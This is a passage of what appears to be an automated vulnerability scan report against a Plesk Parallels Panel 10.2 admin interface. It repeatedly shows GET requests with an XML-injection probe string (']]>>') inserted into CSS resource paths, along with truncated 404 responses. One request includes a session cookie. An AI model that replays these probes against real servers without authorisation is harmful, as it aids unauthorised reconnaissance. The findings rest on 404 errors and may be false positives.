GET /skins/default/css/admin/custom.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/main.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/admin/main.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/main.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/admin/main.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/main.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/admin/main.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/main.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/admin]]>>/main.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/main.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/admin/main.css]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/base.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:38 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/base.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:44 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/base.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/common/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:51 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/base.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common]]>>/base.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:57 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/base.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common/base.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:26:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/btns.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:29 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/btns.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:35 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/btns.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/common/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:42 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/btns.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common]]>>/btns.css?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:48 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/btns.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common/btns.css]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:54 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/common/double-list-selector.css?1297230722 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:36 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/common/double-list-selector.css?1297230722 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:38 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/common/double-list-selector.css?1297230722 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:40 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common]]>>/double-list-selector.css?1297230722 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:42 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/common/double-list-selector.css]]>>?1297230722 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:44 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/ie.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/common/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/ie.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/common/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/common/ie.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/common/ie.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
